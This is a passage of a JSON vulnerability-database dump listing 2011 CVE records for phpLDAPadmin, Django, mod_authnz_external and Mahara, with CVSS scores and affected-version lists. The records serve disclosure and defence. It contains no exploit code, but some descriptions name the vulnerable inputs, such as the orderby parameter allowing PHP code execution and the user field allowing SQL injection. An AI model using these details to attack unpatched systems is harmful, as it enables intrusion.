"cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.5", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1"], "id": "CVE-2011-4074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4074", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:39", "description": "The CSRF protection mechanism in Django through 1.2.7 and 1.3.x through 1.3.1 does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests via vectors involving a DNS CNAME record and a web page containing JavaScript code.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4140", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4140"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4140", 
"cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:35", "description": "django.contrib.sessions in Django before 1.2.7 and 1.3.x before 1.3.1, when session data is stored in the cache, uses the root namespace for both session identifiers and application-data keys, which allows remote attackers to modify a session by triggering use of a key that is equal to that session's identifier.", "cvss3": {}, "published": "2011-10-19T10:55:00", "type": "cve", "title": "CVE-2011-4136", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4136"], "modified": "2018-01-18T02:29:00", "cpe": ["cpe:/a:djangoproject:django:0.96", "cpe:/a:djangoproject:django:1.1.0", "cpe:/a:djangoproject:django:1.2", "cpe:/a:djangoproject:django:1.2.6", "cpe:/a:djangoproject:django:1.2.3", "cpe:/a:djangoproject:django:1.0.1", "cpe:/a:djangoproject:django:1.3", "cpe:/a:djangoproject:django:1.2.4", "cpe:/a:djangoproject:django:1.1", "cpe:/a:djangoproject:django:1.2.1", "cpe:/a:djangoproject:django:1.0.2", "cpe:/a:djangoproject:django:0.91", "cpe:/a:djangoproject:django:1.1.2", "cpe:/a:djangoproject:django:1.2.5", "cpe:/a:djangoproject:django:0.95.1", "cpe:/a:djangoproject:django:0.95", "cpe:/a:djangoproject:django:1.0", "cpe:/a:djangoproject:django:1.2.2", "cpe:/a:djangoproject:django:1.1.3"], "id": "CVE-2011-4136", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4136", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:djangoproject:django:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha1:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.3:alpha2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:2:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:djangoproject:django:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:0.95:*:*:*:*:*:*:*", "cpe:2.3:a:djangoproject:django:1.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:37:20", "description": "The masort function in lib/functions.php in phpLDAPadmin 1.2.x before 1.2.2 allows remote attackers to execute arbitrary PHP code via the orderby parameter (aka sortby variable) in a query_engine action to cmd.php, as exploited in the wild in October 2011.", "cvss3": {}, "published": "2011-11-02T17:55:00", "type": "cve", "title": "CVE-2011-4075", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2020-11-09T13:30:00", "cpe": ["cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.2", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.4", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.3", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.5", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.0.1", "cpe:/a:phpldapadmin_project:phpldapadmin:1.2.1"], "id": "CVE-2011-4075", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpldapadmin_project:phpldapadmin:1.2.0.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:14:20", "description": "SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.", "cvss3": {}, "published": "2011-07-28T18:55:00", "type": "cve", "title": "CVE-2011-2688", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2020-11-16T20:47:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0", "cpe:/a:mod_authnz_external_project:mod_authnz_external:3.2.5"], "id": "CVE-2011-2688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mod_authnz_external_project:mod_authnz_external:3.2.5:*:*:*:*:*:*:*", 
"cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:15:53", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Mahara before 1.4.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) URI attributes and (2) the External Feed component, as demonstrated by the guid element in an RSS feed.", "cvss3": {}, "published": "2011-11-15T03:57:00", "type": "cve", "title": "CVE-2011-2771", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2771"], "modified": "2011-11-15T05:00:00", "cpe": ["cpe:/a:mahara:mahara:1.3.1", "cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.0.8", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.1.4", "cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.1.2", 
"cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:0.9.0"], "id": "CVE-2011-2771", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2771", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", 
"cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha2:*:*:*:*:*:*", 
"cpe:2.3:a:mahara:mahara:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:15:55", "description": "Cross-site request forgery (CSRF) vulnerability in Mahara before 1.4.1 allows remote attackers to hijack the authentication of administrators for requests that add a user to an institution.", "cvss3": {}, "published": "2011-11-15T03:57:00", "type": "cve", "title": "CVE-2011-2773", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2773"], "modified": "2011-11-15T05:00:00", "cpe": ["cpe:/a:mahara:mahara:1.3.1", "cpe:/a:mahara:mahara:1.2.0", "cpe:/a:mahara:mahara:1.2.5", "cpe:/a:mahara:mahara:1.2.4", "cpe:/a:mahara:mahara:0.9.2", "cpe:/a:mahara:mahara:1.3.0", "cpe:/a:mahara:mahara:1.4.0", "cpe:/a:mahara:mahara:1.1.1", "cpe:/a:mahara:mahara:1.1.3", "cpe:/a:mahara:mahara:1.3.5", "cpe:/a:mahara:mahara:1.0.11", "cpe:/a:mahara:mahara:1.0.8", "cpe:/a:mahara:mahara:1.0.9", "cpe:/a:mahara:mahara:1.1.8", "cpe:/a:mahara:mahara:1.1.9", "cpe:/a:mahara:mahara:1.3.4", "cpe:/a:mahara:mahara:1.3.7", "cpe:/a:mahara:mahara:1.0.4", "cpe:/a:mahara:mahara:1.0.0", "cpe:/a:mahara:mahara:1.0.7", "cpe:/a:mahara:mahara:1.3.6", "cpe:/a:mahara:mahara:1.3.2", "cpe:/a:mahara:mahara:1.2.6", "cpe:/a:mahara:mahara:0.9.1", "cpe:/a:mahara:mahara:1.0.12", "cpe:/a:mahara:mahara:1.0.2", "cpe:/a:mahara:mahara:1.1.4", 
"cpe:/a:mahara:mahara:1.0.15", "cpe:/a:mahara:mahara:1.0.6", "cpe:/a:mahara:mahara:1.1.2", "cpe:/a:mahara:mahara:1.2.3", "cpe:/a:mahara:mahara:1.0.13", "cpe:/a:mahara:mahara:1.0.3", "cpe:/a:mahara:mahara:1.3.3", "cpe:/a:mahara:mahara:1.0.14", "cpe:/a:mahara:mahara:1.1", "cpe:/a:mahara:mahara:1.0.10", "cpe:/a:mahara:mahara:1.1.5", "cpe:/a:mahara:mahara:1.1.6", "cpe:/a:mahara:mahara:1.0.1", "cpe:/a:mahara:mahara:1.2.1", "cpe:/a:mahara:mahara:1.2.2", "cpe:/a:mahara:mahara:1.1.0", "cpe:/a:mahara:mahara:1.1.7", "cpe:/a:mahara:mahara:1.0.5", "cpe:/a:mahara:mahara:1.4", "cpe:/a:mahara:mahara:0.9.0"], "id": "CVE-2011-2773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2773", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mahara:mahara:1.1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:mahara:mahara:1.4:rc4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.0:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*", 